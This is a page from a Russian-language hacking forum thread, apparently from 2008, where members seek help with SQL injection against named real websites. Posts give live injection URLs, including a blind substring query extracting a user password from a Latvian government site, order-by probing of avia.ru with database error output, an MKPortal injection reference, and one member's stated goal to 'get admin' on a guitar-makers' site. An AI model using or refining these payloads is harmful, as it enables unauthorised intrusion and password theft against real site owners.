HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 276 из 2422 « Первая < 176226266 272 273 274 275 276 277 278 279 280 2863263767761276 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.07.2008, 11:16
The_XOPb
Новичок
Регистрация: 25.07.2008
Сообщений: 3
С нами: 9366158

Репутация: 0
По умолчанию
Спасибо MaSTeR GэN! Но, великое братство мегахакеров, продолжу вас мучить тупыми вопросами! Есть ресурс, у которого при пустом значении поиска выводится страница со следующим сообщением "Template->loadfile(): No file specified for handle search_block". Это можно для какого-нить хулиганства использовать?

С уважением, пока всё ещё ламер!
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 28.07.2008, 15:50
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию
Цитата:
Сообщение от DDoSька  
нету полезных,я специально на локалхосте посмотрел,и не нашел =\
Ужась.... =_____________=
 
Ответить с цитированием

  #3  
Старый 28.07.2008, 02:37
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию
http://www.fm.gov.lv/index.php?id=8-8=5+and+ascii(substring((select+password+from+user s+limit+1,1),1,1))=100/*

Почему не выходит посимвольный перебор ? оООО
Последний раз редактировалось Велемир; 28.07.2008 в 03:17..
 
Ответить с цитированием

  #4  
Старый 28.07.2008, 12:28
The_XOPb
Новичок
Регистрация: 25.07.2008
Сообщений: 3
С нами: 9366158

Репутация: 0
По умолчанию
Спасибо тебе Bonnie! И тебе Clyde! Будет повод подучить английский!
 
Ответить с цитированием

  #5  
Старый 28.07.2008, 12:56
big_BRAT
Познающий
Регистрация: 24.12.2006
Сообщений: 90
С нами: 10200612

Репутация: 168
По умолчанию
http://www.lutherie-guitare.org что за движек? на самописный вроде не похож....
_http://www.lutherie-guitare.org/Main.php?do=Detailler&submit=detaillerObjet&objet= Doc&numero=260'--
вроде как и значение не фильтруется? но запрос такого вида проходит... _http://www.lutherie-guitare.org/Main.php?do=Detailler&submit=detaillerObjet&objet= Doc&numero=260sdfsdf
уже замаялся, кто поможет, нуна получить админа
 
Ответить с цитированием

  #6  
Старый 28.07.2008, 20:31
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию
Провожу иньекцию по этой ссылке
https://forum.antichat.ru/thread35599.html

Получается следующее:

http://www.avia.ru/pr/?id=-1'+order+by+1--


Цитата:
Warning: pg_exec() query failed: ERROR: invalid input syntax for integer: "-1' order by 1--" in /var/www/www.avia.ru/htdocs/pr/index.php on line 13
Order by запрещен??
 
Ответить с цитированием

  #7  
Старый 31.07.2008, 01:28
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
С нами: 9361826

Репутация: 115
По умолчанию
Цитата:
Сообщение от Ershik  
Провожу иньекцию по этой ссылке
https://forum.antichat.ru/thread35599.html

Получается следующее:

http://www.avia.ru/pr/?id=-1'+order+by+1--



Order by запрещен??
вероятнее всего твой запрос проходит, а на следующем скул уже не прокатывает. И такой -- комментарий на будущее должен с обоих сторон обрамлятся пробелом +by+1+--+, хотя на некоторых серваках вроде и так пашет...
 
Ответить с цитированием

  #8  
Старый 28.07.2008, 20:45
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию
Ershik
а там есть скуль? ругается на неверный даныные int
Последний раз редактировалось sabe; 28.07.2008 в 20:48..
 
Ответить с цитированием

  #9  
Старый 28.07.2008, 20:47
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию
А смысл?
Цитата:
Warning: pg_exec() query failed: ERROR: invalid input syntax for integer: "-1 order by 1--" in /var/www/www.avia.ru/htdocs/pr/index.php on line 13

Warning: pg_numrows(): supplied argument is not a valid PostgreSQL result resource in /var/www/www.avia.ru/htdocs/pr/index.php on line 14
З.Ы. Я тоже, по статье делаю.
 
Ответить с цитированием

  #10  
Старый 29.07.2008, 01:34
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
С нами: 9483229

Репутация: 1160
По умолчанию
ВСем Прюэт!
Есть такая уязвимость в MKportale 1.1:
_http://www.securityfocus.com/archive/1/485035
Код HTML:
: Discovery by: 
Sw33t h4cK3r    
: POWERED BY
: MKPortal M1.1 
Exploit :
http://Example.com
index.php?ind=gallery&op=foto_show&ida=(sql)
Только я не понимаю,что дает это инъекция,никак не получаеться раскрутить...Прошу помощи :-)
Последний раз редактировалось DDoSька; 29.07.2008 в 01:37..
 
Ответить с цитированием
Ответ
Страница 276 из 2422 « Первая < 176226266 272 273 274 275 276 277 278 279 280 2863263767761276 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.